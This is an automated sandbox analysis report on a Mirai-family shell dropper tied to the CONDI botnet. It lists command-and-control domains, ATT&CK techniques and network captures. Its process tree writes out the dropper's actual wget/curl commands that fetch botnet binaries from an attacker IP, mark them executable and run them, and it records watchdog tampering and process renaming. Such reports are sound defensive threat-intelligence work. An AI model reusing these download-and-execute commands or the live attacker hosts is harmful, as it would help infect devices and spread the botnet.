mirai | 6c568bd265a5c182913cd277c88a151c797dfeb05244edaf156dea1b389a0baa

Analysis

max time kernel
149s
max time network
149s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240729-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240729-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
29/12/2024, 21:37 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

51.79.141.121-sora.sh-2024-12-29T211113.sh
Size

2KB
MD5

0569b09a5951d5fe444efa1892b87687
SHA1

0d3df40a37ec718be33d83c1c9a962e982a51d17
SHA256

6c568bd265a5c182913cd277c88a151c797dfeb05244edaf156dea1b389a0baa
SHA512

fbdf5cd3d7ee86f61d205e2745661444152304f594c73562a5b7d59adfdfed3adadbb59954afb7618f64d29e283ef15e1dfaf82cef3a79dc74c08cda5580b11d

Score

10^/10

mirai condi botnet defense_evasion discovery

Malware Config

Extracted

Family

mirai

Botnet

CONDI

botnet.tfmobile.store

report.tfmobile.store

Signatures

Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai
Mirai family
mirai
Contacts a large (46061) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

File and Directory Permissions Modification 1 TTPs 13 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
1560	chmod
1568	chmod
1584	chmod
1592	chmod
1600	chmod
1616	chmod
1534	chmod
1542	chmod
1624	chmod
1576	chmod
1608	chmod
1526	chmod
1550	chmod

Executes dropped EXE 13 IoCs

ioc	pid	Process
/tmp/robben	1527	robben
/tmp/robben	1535	robben
/tmp/robben	1543	robben
/tmp/robben	1551	robben
/tmp/robben	1561	robben
/tmp/robben	1569	robben
/tmp/robben	1577	robben
/tmp/robben	1585	robben
/tmp/robben	1593	robben
/tmp/robben	1601	robben
/tmp/robben	1609	robben
/tmp/robben	1617	robben
/tmp/robben	1625	robben

Modifies Watchdog functionality 1 TTPs 24 IoCs

Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

defense_evasion

Impair Defenses

T1562

description	ioc	Process
File opened for modification	/dev/watchdog	robben
File opened for modification	/dev/watchdog	robben
File opened for modification	/dev/misc/watchdog	robben
File opened for modification	/dev/watchdog	robben
File opened for modification	/dev/watchdog	robben
File opened for modification	/dev/watchdog	robben
File opened for modification	/dev/misc/watchdog	robben
File opened for modification	/dev/misc/watchdog	robben
File opened for modification	/dev/misc/watchdog	robben
File opened for modification	/dev/watchdog	robben
File opened for modification	/dev/misc/watchdog	robben
File opened for modification	/dev/misc/watchdog	robben
File opened for modification	/dev/watchdog	robben
File opened for modification	/dev/misc/watchdog	robben
File opened for modification	/dev/misc/watchdog	robben
File opened for modification	/dev/watchdog	robben
File opened for modification	/dev/misc/watchdog	robben
File opened for modification	/dev/watchdog	robben
File opened for modification	/dev/misc/watchdog	robben
File opened for modification	/dev/watchdog	robben
File opened for modification	/dev/watchdog	robben
File opened for modification	/dev/watchdog	robben
File opened for modification	/dev/misc/watchdog	robben
File opened for modification	/dev/misc/watchdog	robben

Enumerates active TCP sockets 1 TTPs 11 IoCs

Gets active TCP sockets from /proc virtual filesystem.

discovery

System Network Connections Discovery

T1049

description	ioc	Process
File opened for reading	/proc/net/tcp	robben
File opened for reading	/proc/net/tcp	robben
File opened for reading	/proc/net/tcp	robben
File opened for reading	/proc/net/tcp	robben
File opened for reading	/proc/net/tcp	robben
File opened for reading	/proc/net/tcp	robben
File opened for reading	/proc/net/tcp	robben
File opened for reading	/proc/net/tcp	robben
File opened for reading	/proc/net/tcp	robben
File opened for reading	/proc/net/tcp	robben
File opened for reading	/proc/net/tcp	robben

Writes file to system bin folder 12 IoCs

description	ioc	Process
File opened for modification	/sbin/watchdog	robben
File opened for modification	/sbin/watchdog	robben
File opened for modification	/sbin/watchdog	robben
File opened for modification	/sbin/watchdog	robben
File opened for modification	/sbin/watchdog	robben
File opened for modification	/sbin/watchdog	robben
File opened for modification	/sbin/watchdog	robben
File opened for modification	/sbin/watchdog	robben
File opened for modification	/sbin/watchdog	robben
File opened for modification	/sbin/watchdog	robben
File opened for modification	/sbin/watchdog	robben
File opened for modification	/sbin/watchdog	robben

Changes its process name 12 IoCs

description	pid	Process
Changes the process name, possibly in an attempt to hide itself	1527	robben
Changes the process name, possibly in an attempt to hide itself	1535	robben
Changes the process name, possibly in an attempt to hide itself	1543	robben
Changes the process name, possibly in an attempt to hide itself	1551	robben
Changes the process name, possibly in an attempt to hide itself	1561	robben
Changes the process name, possibly in an attempt to hide itself	1569	robben
Changes the process name, possibly in an attempt to hide itself	1577	robben
Changes the process name, possibly in an attempt to hide itself	1585	robben
Changes the process name, possibly in an attempt to hide itself	1593	robben
Changes the process name, possibly in an attempt to hide itself	1601	robben
Changes the process name, possibly in an attempt to hide itself	1609	robben
Changes the process name, possibly in an attempt to hide itself	1617	robben

Reads system network configuration 1 TTPs 11 IoCs

Uses contents of /proc filesystem to enumerate network settings.

discovery

Internet Connection Discovery

T1016.001

description	ioc	Process
File opened for reading	/proc/net/tcp	robben
File opened for reading	/proc/net/tcp	robben
File opened for reading	/proc/net/tcp	robben
File opened for reading	/proc/net/tcp	robben
File opened for reading	/proc/net/tcp	robben
File opened for reading	/proc/net/tcp	robben
File opened for reading	/proc/net/tcp	robben
File opened for reading	/proc/net/tcp	robben
File opened for reading	/proc/net/tcp	robben
File opened for reading	/proc/net/tcp	robben
File opened for reading	/proc/net/tcp	robben

System Network Configuration Discovery 1 TTPs 2 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
1529	wget
1532	curl

Writes file to tmp directory 22 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/botx.x86	curl
File opened for modification	/tmp/botx.arm4	curl
File opened for modification	/tmp/botx.m68k	wget
File opened for modification	/tmp/botx.m68k	curl
File opened for modification	/tmp/botx.x86_64	curl
File opened for modification	/tmp/botx.mpsl	curl
File opened for modification	/tmp/botx.arm6	wget
File opened for modification	/tmp/botx.ppc	curl
File opened for modification	/tmp/botx.ppc440fp	curl
File opened for modification	/tmp/botx.arm6	curl
File opened for modification	/tmp/botx.arm7	wget
File opened for modification	/tmp/botx.x86	wget
File opened for modification	/tmp/botx.mips	curl
File opened for modification	/tmp/botx.i468	curl
File opened for modification	/tmp/botx.i686	curl
File opened for modification	/tmp/botx.arm5	wget
File opened for modification	/tmp/botx.arm5	curl
File opened for modification	/tmp/botx.arm7	curl
File opened for modification	/tmp/robben	51.79.141.121-sora.sh-2024-12-29T211113.sh
File opened for modification	/tmp/botx.mips	wget
File opened for modification	/tmp/botx.mpsl	wget
File opened for modification	/tmp/botx.ppc	wget

/tmp/51.79.141.121-sora.sh-2024-12-29T211113.sh
/tmp/51.79.141.121-sora.sh-2024-12-29T211113.sh
1⤵
- Writes file to tmp directory
PID:1511
- /usr/bin/wget
  wget http://51.79.141.121/where/botx.x86
  2⤵
  - Writes file to tmp directory
  PID:1512
- /usr/bin/curl
  curl -O http://51.79.141.121/where/botx.x86
  2⤵
  - Writes file to tmp directory
  PID:1524
- /bin/cat
  cat botx.x86
  2⤵
  PID:1525
- /bin/chmod
  chmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.x86 config-err-1OUX9G netplan_v_g5g3la robben snap-private-tmp ssh-MPhJtsB3VVKJ systemd-private-151e480fd0924888954e80f467817a3a-bolt.service-702Wty systemd-private-151e480fd0924888954e80f467817a3a-colord.service-VPUtWE systemd-private-151e480fd0924888954e80f467817a3a-ModemManager.service-TuP9BW systemd-private-151e480fd0924888954e80f467817a3a-systemd-resolved.service-FM1cwa systemd-private-151e480fd0924888954e80f467817a3a-systemd-timedated.service-dNivO8
  2⤵
  - File and Directory Permissions Modification
  PID:1526
- /tmp/robben
  ./robben Payload
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Changes its process name
  PID:1527
- /usr/bin/wget
  wget http://51.79.141.121/where/botx.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1529
- /usr/bin/curl
  curl -O http://51.79.141.121/where/botx.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1532
- /bin/chmod
  chmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.mips botx.x86 config-err-1OUX9G netplan_v_g5g3la robben snap-private-tmp ssh-MPhJtsB3VVKJ systemd-private-151e480fd0924888954e80f467817a3a-bolt.service-702Wty systemd-private-151e480fd0924888954e80f467817a3a-colord.service-VPUtWE systemd-private-151e480fd0924888954e80f467817a3a-ModemManager.service-TuP9BW systemd-private-151e480fd0924888954e80f467817a3a-systemd-resolved.service-FM1cwa systemd-private-151e480fd0924888954e80f467817a3a-systemd-timedated.service-dNivO8
  2⤵
  - File and Directory Permissions Modification
  PID:1534
- /tmp/robben
  ./robben Payload
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Writes file to system bin folder
  - Changes its process name
  - Reads system network configuration
  PID:1535
- /usr/bin/wget
  wget http://51.79.141.121/where/botx.x86_64
  2⤵
  PID:1537
- /usr/bin/curl
  curl -O http://51.79.141.121/where/botx.x86_64
  2⤵
  - Writes file to tmp directory
  PID:1540
- /bin/chmod
  chmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.mips botx.x86 botx.x86_64 config-err-1OUX9G netplan_v_g5g3la robben snap-private-tmp ssh-MPhJtsB3VVKJ systemd-private-151e480fd0924888954e80f467817a3a-bolt.service-702Wty systemd-private-151e480fd0924888954e80f467817a3a-colord.service-VPUtWE systemd-private-151e480fd0924888954e80f467817a3a-ModemManager.service-TuP9BW systemd-private-151e480fd0924888954e80f467817a3a-systemd-resolved.service-FM1cwa systemd-private-151e480fd0924888954e80f467817a3a-systemd-timedated.service-dNivO8
  2⤵
  - File and Directory Permissions Modification
  PID:1542
- /tmp/robben
  ./robben Payload
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Writes file to system bin folder
  - Changes its process name
  - Reads system network configuration
  PID:1543
- /usr/bin/wget
  wget http://51.79.141.121/where/botx.i468
  2⤵
  PID:1545
- /usr/bin/curl
  curl -O http://51.79.141.121/where/botx.i468
  2⤵
  - Writes file to tmp directory
  PID:1548
- /bin/chmod
  chmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.i468 botx.mips botx.x86 botx.x86_64 config-err-1OUX9G netplan_v_g5g3la robben snap-private-tmp ssh-MPhJtsB3VVKJ systemd-private-151e480fd0924888954e80f467817a3a-bolt.service-702Wty systemd-private-151e480fd0924888954e80f467817a3a-colord.service-VPUtWE systemd-private-151e480fd0924888954e80f467817a3a-ModemManager.service-TuP9BW systemd-private-151e480fd0924888954e80f467817a3a-systemd-resolved.service-FM1cwa systemd-private-151e480fd0924888954e80f467817a3a-systemd-timedated.service-dNivO8
  2⤵
  - File and Directory Permissions Modification
  PID:1550
- /tmp/robben
  ./robben Payload
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Writes file to system bin folder
  - Changes its process name
  - Reads system network configuration
  PID:1551
- /usr/bin/wget
  wget http://51.79.141.121/where/botx.i686
  2⤵
  PID:1555
- /usr/bin/curl
  curl -O http://51.79.141.121/where/botx.i686
  2⤵
  - Writes file to tmp directory
  PID:1558
- /bin/chmod
  chmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.i468 botx.i686 botx.mips botx.x86 botx.x86_64 config-err-1OUX9G netplan_v_g5g3la robben snap-private-tmp ssh-MPhJtsB3VVKJ systemd-private-151e480fd0924888954e80f467817a3a-bolt.service-702Wty systemd-private-151e480fd0924888954e80f467817a3a-colord.service-VPUtWE systemd-private-151e480fd0924888954e80f467817a3a-ModemManager.service-TuP9BW systemd-private-151e480fd0924888954e80f467817a3a-systemd-resolved.service-FM1cwa
  2⤵
  - File and Directory Permissions Modification
  PID:1560
- /tmp/robben
  ./robben Payload
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Writes file to system bin folder
  - Changes its process name
  - Reads system network configuration
  PID:1561
- /usr/bin/wget
  wget http://51.79.141.121/where/botx.mpsl
  2⤵
  - Writes file to tmp directory
  PID:1563
- /usr/bin/curl
  curl -O http://51.79.141.121/where/botx.mpsl
  2⤵
  - Writes file to tmp directory
  PID:1566
- /bin/chmod
  chmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.i468 botx.i686 botx.mips botx.mpsl botx.x86 botx.x86_64 config-err-1OUX9G netplan_v_g5g3la robben snap-private-tmp ssh-MPhJtsB3VVKJ systemd-private-151e480fd0924888954e80f467817a3a-bolt.service-702Wty systemd-private-151e480fd0924888954e80f467817a3a-colord.service-VPUtWE systemd-private-151e480fd0924888954e80f467817a3a-ModemManager.service-TuP9BW systemd-private-151e480fd0924888954e80f467817a3a-systemd-resolved.service-FM1cwa
  2⤵
  - File and Directory Permissions Modification
  PID:1568
- /tmp/robben
  ./robben Payload
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Writes file to system bin folder
  - Changes its process name
  - Reads system network configuration
  PID:1569
- /usr/bin/wget
  wget http://51.79.141.121/where/botx.arm4
  2⤵
  PID:1571
- /usr/bin/curl
  curl -O http://51.79.141.121/where/botx.arm4
  2⤵
  - Writes file to tmp directory
  PID:1574
- /bin/chmod
  chmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.arm4 botx.i468 botx.i686 botx.mips botx.mpsl botx.x86 botx.x86_64 config-err-1OUX9G netplan_v_g5g3la robben snap-private-tmp ssh-MPhJtsB3VVKJ systemd-private-151e480fd0924888954e80f467817a3a-bolt.service-702Wty systemd-private-151e480fd0924888954e80f467817a3a-colord.service-VPUtWE systemd-private-151e480fd0924888954e80f467817a3a-ModemManager.service-TuP9BW systemd-private-151e480fd0924888954e80f467817a3a-systemd-resolved.service-FM1cwa
  2⤵
  - File and Directory Permissions Modification
  PID:1576
- /tmp/robben
  ./robben Payload
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Writes file to system bin folder
  - Changes its process name
  - Reads system network configuration
  PID:1577
- /usr/bin/wget
  wget http://51.79.141.121/where/botx.arm5
  2⤵
  - Writes file to tmp directory
  PID:1579
- /usr/bin/curl
  curl -O http://51.79.141.121/where/botx.arm5
  2⤵
  - Writes file to tmp directory
  PID:1582
- /bin/chmod
  chmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.arm4 botx.arm5 botx.i468 botx.i686 botx.mips botx.mpsl botx.x86 botx.x86_64 config-err-1OUX9G netplan_v_g5g3la robben snap-private-tmp ssh-MPhJtsB3VVKJ systemd-private-151e480fd0924888954e80f467817a3a-bolt.service-702Wty systemd-private-151e480fd0924888954e80f467817a3a-colord.service-VPUtWE systemd-private-151e480fd0924888954e80f467817a3a-ModemManager.service-TuP9BW systemd-private-151e480fd0924888954e80f467817a3a-systemd-resolved.service-FM1cwa
  2⤵
  - File and Directory Permissions Modification
  PID:1584
- /tmp/robben
  ./robben Payload
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Writes file to system bin folder
  - Changes its process name
  - Reads system network configuration
  PID:1585
- /usr/bin/wget
  wget http://51.79.141.121/where/botx.arm6
  2⤵
  - Writes file to tmp directory
  PID:1587
- /usr/bin/curl
  curl -O http://51.79.141.121/where/botx.arm6
  2⤵
  - Writes file to tmp directory
  PID:1590
- /bin/chmod
  chmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.arm4 botx.arm5 botx.arm6 botx.i468 botx.i686 botx.mips botx.mpsl botx.x86 botx.x86_64 config-err-1OUX9G netplan_v_g5g3la robben snap-private-tmp ssh-MPhJtsB3VVKJ systemd-private-151e480fd0924888954e80f467817a3a-bolt.service-702Wty systemd-private-151e480fd0924888954e80f467817a3a-colord.service-VPUtWE systemd-private-151e480fd0924888954e80f467817a3a-ModemManager.service-TuP9BW systemd-private-151e480fd0924888954e80f467817a3a-systemd-resolved.service-FM1cwa
  2⤵
  - File and Directory Permissions Modification
  PID:1592
- /tmp/robben
  ./robben Payload
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Writes file to system bin folder
  - Changes its process name
  - Reads system network configuration
  PID:1593
- /usr/bin/wget
  wget http://51.79.141.121/where/botx.arm7
  2⤵
  - Writes file to tmp directory
  PID:1595
- /usr/bin/curl
  curl -O http://51.79.141.121/where/botx.arm7
  2⤵
  - Writes file to tmp directory
  PID:1598
- /bin/chmod
  chmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.arm4 botx.arm5 botx.arm6 botx.arm7 botx.i468 botx.i686 botx.mips botx.mpsl botx.x86 botx.x86_64 config-err-1OUX9G netplan_v_g5g3la robben snap-private-tmp ssh-MPhJtsB3VVKJ systemd-private-151e480fd0924888954e80f467817a3a-bolt.service-702Wty systemd-private-151e480fd0924888954e80f467817a3a-colord.service-VPUtWE systemd-private-151e480fd0924888954e80f467817a3a-ModemManager.service-TuP9BW systemd-private-151e480fd0924888954e80f467817a3a-systemd-resolved.service-FM1cwa
  2⤵
  - File and Directory Permissions Modification
  PID:1600
- /tmp/robben
  ./robben Payload
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Writes file to system bin folder
  - Changes its process name
  - Reads system network configuration
  PID:1601
- /usr/bin/wget
  wget http://51.79.141.121/where/botx.ppc
  2⤵
  - Writes file to tmp directory
  PID:1603
- /usr/bin/curl
  curl -O http://51.79.141.121/where/botx.ppc
  2⤵
  - Writes file to tmp directory
  PID:1606
- /bin/chmod
  chmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.arm4 botx.arm5 botx.arm6 botx.arm7 botx.i468 botx.i686 botx.mips botx.mpsl botx.ppc botx.x86 botx.x86_64 config-err-1OUX9G netplan_v_g5g3la robben snap-private-tmp ssh-MPhJtsB3VVKJ systemd-private-151e480fd0924888954e80f467817a3a-bolt.service-702Wty systemd-private-151e480fd0924888954e80f467817a3a-colord.service-VPUtWE systemd-private-151e480fd0924888954e80f467817a3a-ModemManager.service-TuP9BW systemd-private-151e480fd0924888954e80f467817a3a-systemd-resolved.service-FM1cwa
  2⤵
  - File and Directory Permissions Modification
  PID:1608
- /tmp/robben
  ./robben Payload
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Writes file to system bin folder
  - Changes its process name
  - Reads system network configuration
  PID:1609
- /usr/bin/wget
  wget http://51.79.141.121/where/botx.ppc440fp
  2⤵
  PID:1611
- /usr/bin/curl
  curl -O http://51.79.141.121/where/botx.ppc440fp
  2⤵
  - Writes file to tmp directory
  PID:1614
- /bin/chmod
  chmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.arm4 botx.arm5 botx.arm6 botx.arm7 botx.i468 botx.i686 botx.mips botx.mpsl botx.ppc botx.ppc440fp botx.x86 botx.x86_64 config-err-1OUX9G netplan_v_g5g3la robben snap-private-tmp ssh-MPhJtsB3VVKJ systemd-private-151e480fd0924888954e80f467817a3a-bolt.service-702Wty systemd-private-151e480fd0924888954e80f467817a3a-colord.service-VPUtWE systemd-private-151e480fd0924888954e80f467817a3a-ModemManager.service-TuP9BW systemd-private-151e480fd0924888954e80f467817a3a-systemd-resolved.service-FM1cwa
  2⤵
  - File and Directory Permissions Modification
  PID:1616
- /tmp/robben
  ./robben Payload
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Writes file to system bin folder
  - Changes its process name
  - Reads system network configuration
  PID:1617
- /usr/bin/wget
  wget http://51.79.141.121/where/botx.m68k
  2⤵
  - Writes file to tmp directory
  PID:1619
- /usr/bin/curl
  curl -O http://51.79.141.121/where/botx.m68k
  2⤵
  - Writes file to tmp directory
  PID:1622
- /bin/chmod
  chmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.arm4 botx.arm5 botx.arm6 botx.arm7 botx.i468 botx.i686 botx.m68k botx.mips botx.mpsl botx.ppc botx.ppc440fp botx.x86 botx.x86_64 config-err-1OUX9G netplan_v_g5g3la robben snap-private-tmp ssh-MPhJtsB3VVKJ systemd-private-151e480fd0924888954e80f467817a3a-bolt.service-702Wty systemd-private-151e480fd0924888954e80f467817a3a-colord.service-VPUtWE systemd-private-151e480fd0924888954e80f467817a3a-ModemManager.service-TuP9BW systemd-private-151e480fd0924888954e80f467817a3a-systemd-resolved.service-FM1cwa
  2⤵
  - File and Directory Permissions Modification
  PID:1624
- /tmp/robben
  ./robben Payload
  2⤵
  - Executes dropped EXE
  PID:1625

Network

GET

http://51.79.141.121/where/botx.x86

Remote address:

51.79.141.121:80

Request

GET /where/botx.x86 HTTP/1.1
User-Agent: Wget/1.19.4 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: 51.79.141.121
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Sun, 29 Dec 2024 21:37:03 GMT
Server: Apache/2.4.6 (CentOS) PHP/7.3.33
Last-Modified: Sat, 28 Dec 2024 16:49:23 GMT
ETag: "c8b4-62a575c8dfc31"
Accept-Ranges: bytes
Content-Length: 51380
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
DNS

1527653184.rsc.cdn77.org

Remote address:

1.1.1.1:53

Request

1527653184.rsc.cdn77.org

IN A

Response

1527653184.rsc.cdn77.org

IN A

84.17.50.9

1527653184.rsc.cdn77.org

IN A

89.187.167.39
DNS

1527653184.rsc.cdn77.org

Remote address:

1.1.1.1:53

Request

1527653184.rsc.cdn77.org

IN AAAA

Response

1527653184.rsc.cdn77.org

IN AAAA

2a02:6ea0:ca00::7

1527653184.rsc.cdn77.org

IN AAAA

2a02:6ea0:ca00::8
GET

http://51.79.141.121/where/botx.x86

Remote address:

51.79.141.121:80

Request

GET /where/botx.x86 HTTP/1.1
Host: 51.79.141.121
User-Agent: curl/7.58.0
Accept: */*

Response

HTTP/1.1 200 OK

Date: Sun, 29 Dec 2024 21:37:04 GMT
Server: Apache/2.4.6 (CentOS) PHP/7.3.33
Last-Modified: Sat, 28 Dec 2024 16:49:23 GMT
ETag: "c8b4-62a575c8dfc31"
Accept-Ranges: bytes
Content-Length: 51380
GET

http://51.79.141.121/where/botx.mips

Remote address:

51.79.141.121:80

Request

GET /where/botx.mips HTTP/1.1
User-Agent: Wget/1.19.4 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: 51.79.141.121
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Sun, 29 Dec 2024 21:37:06 GMT
Server: Apache/2.4.6 (CentOS) PHP/7.3.33
Last-Modified: Sat, 28 Dec 2024 16:49:23 GMT
ETag: "11e58-62a575c8dfc31"
Accept-Ranges: bytes
Content-Length: 73304
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
DNS

botnet.tfmobile.store

Remote address:

8.8.8.8:53

Request

botnet.tfmobile.store

IN A

Response

botnet.tfmobile.store

IN A

51.79.141.121
GET

http://51.79.141.121/where/botx.mips

Remote address:

51.79.141.121:80

Request

GET /where/botx.mips HTTP/1.1
Host: 51.79.141.121
User-Agent: curl/7.58.0
Accept: */*

Response

HTTP/1.1 200 OK

Date: Sun, 29 Dec 2024 21:37:07 GMT
Server: Apache/2.4.6 (CentOS) PHP/7.3.33
Last-Modified: Sat, 28 Dec 2024 16:49:23 GMT
ETag: "11e58-62a575c8dfc31"
Accept-Ranges: bytes
Content-Length: 73304
DNS

botnet.tfmobile.store

Request

botnet.tfmobile.store

IN A

Response

botnet.tfmobile.store

IN A

51.79.141.121
GET

http://51.79.141.121/where/botx.x86_64

Request

GET /where/botx.x86_64 HTTP/1.1
User-Agent: Wget/1.19.4 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: 51.79.141.121
Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found

Date: Sun, 29 Dec 2024 21:37:18 GMT
Server: Apache/2.4.6 (CentOS) PHP/7.3.33
Content-Length: 215
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
DNS

botnet.tfmobile.store

Request

botnet.tfmobile.store

IN A

Response

botnet.tfmobile.store

IN A

51.79.141.121
GET

http://51.79.141.121/where/botx.x86_64

Request

GET /where/botx.x86_64 HTTP/1.1
Host: 51.79.141.121
User-Agent: curl/7.58.0
Accept: */*

Response

HTTP/1.1 404 Not Found

Date: Sun, 29 Dec 2024 21:37:19 GMT
Server: Apache/2.4.6 (CentOS) PHP/7.3.33
Content-Length: 215
Content-Type: text/html; charset=iso-8859-1
DNS

botnet.tfmobile.store

Request

botnet.tfmobile.store

IN A

Response

botnet.tfmobile.store

IN A

51.79.141.121
GET

http://51.79.141.121/where/botx.i468

Request

GET /where/botx.i468 HTTP/1.1
User-Agent: Wget/1.19.4 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: 51.79.141.121
Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found

Date: Sun, 29 Dec 2024 21:37:29 GMT
Server: Apache/2.4.6 (CentOS) PHP/7.3.33
Content-Length: 213
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
DNS

botnet.tfmobile.store

Request

botnet.tfmobile.store

IN A

Response

botnet.tfmobile.store

IN A

51.79.141.121
GET

http://51.79.141.121/where/botx.i468

Request

GET /where/botx.i468 HTTP/1.1
Host: 51.79.141.121
User-Agent: curl/7.58.0
Accept: */*

Response

HTTP/1.1 404 Not Found

Date: Sun, 29 Dec 2024 21:37:30 GMT
Server: Apache/2.4.6 (CentOS) PHP/7.3.33
Content-Length: 213
Content-Type: text/html; charset=iso-8859-1
DNS

botnet.tfmobile.store

Request

botnet.tfmobile.store

IN A
DNS

botnet.tfmobile.store

Request

botnet.tfmobile.store

IN A
DNS

botnet.tfmobile.store

Request

botnet.tfmobile.store

IN A
DNS

botnet.tfmobile.store

Request

botnet.tfmobile.store

IN A
DNS

botnet.tfmobile.store

Request

botnet.tfmobile.store

IN A

Response

botnet.tfmobile.store

IN A

51.79.141.121
GET

http://51.79.141.121/where/botx.i686

Request

GET /where/botx.i686 HTTP/1.1
User-Agent: Wget/1.19.4 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: 51.79.141.121
Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found

Date: Sun, 29 Dec 2024 21:38:00 GMT
Server: Apache/2.4.6 (CentOS) PHP/7.3.33
Content-Length: 213
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
DNS

botnet.tfmobile.store

Request

botnet.tfmobile.store

IN A

Response

botnet.tfmobile.store

IN A

51.79.141.121
GET

http://51.79.141.121/where/botx.i686

Request

GET /where/botx.i686 HTTP/1.1
Host: 51.79.141.121
User-Agent: curl/7.58.0
Accept: */*

Response

HTTP/1.1 404 Not Found

Date: Sun, 29 Dec 2024 21:38:01 GMT
Server: Apache/2.4.6 (CentOS) PHP/7.3.33
Content-Length: 213
Content-Type: text/html; charset=iso-8859-1
DNS

botnet.tfmobile.store

Request

botnet.tfmobile.store

IN A

Response

botnet.tfmobile.store

IN A

51.79.141.121
GET

http://51.79.141.121/where/botx.mpsl

Request

GET /where/botx.mpsl HTTP/1.1
User-Agent: Wget/1.19.4 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: 51.79.141.121
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Sun, 29 Dec 2024 21:38:07 GMT
Server: Apache/2.4.6 (CentOS) PHP/7.3.33
Last-Modified: Sat, 28 Dec 2024 16:49:23 GMT
ETag: "11e58-62a575c8dfc31"
Accept-Ranges: bytes
Content-Length: 73304
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
DNS

botnet.tfmobile.store

Request

botnet.tfmobile.store

IN A

Response

botnet.tfmobile.store

IN A

51.79.141.121
GET

http://51.79.141.121/where/botx.mpsl

Request

GET /where/botx.mpsl HTTP/1.1
Host: 51.79.141.121
User-Agent: curl/7.58.0
Accept: */*

Response

HTTP/1.1 200 OK

Date: Sun, 29 Dec 2024 21:38:08 GMT
Server: Apache/2.4.6 (CentOS) PHP/7.3.33
Last-Modified: Sat, 28 Dec 2024 16:49:23 GMT
ETag: "11e58-62a575c8dfc31"
Accept-Ranges: bytes
Content-Length: 73304
DNS

botnet.tfmobile.store

Request

botnet.tfmobile.store

IN A

Response

botnet.tfmobile.store

IN A

51.79.141.121
GET

http://51.79.141.121/where/botx.arm4

Request

GET /where/botx.arm4 HTTP/1.1
User-Agent: Wget/1.19.4 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: 51.79.141.121
Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found

Date: Sun, 29 Dec 2024 21:38:19 GMT
Server: Apache/2.4.6 (CentOS) PHP/7.3.33
Content-Length: 213
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
DNS

botnet.tfmobile.store

Request

botnet.tfmobile.store

IN A

Response

botnet.tfmobile.store

IN A

51.79.141.121
GET

http://51.79.141.121/where/botx.arm4

Request

GET /where/botx.arm4 HTTP/1.1
Host: 51.79.141.121
User-Agent: curl/7.58.0
Accept: */*

Response

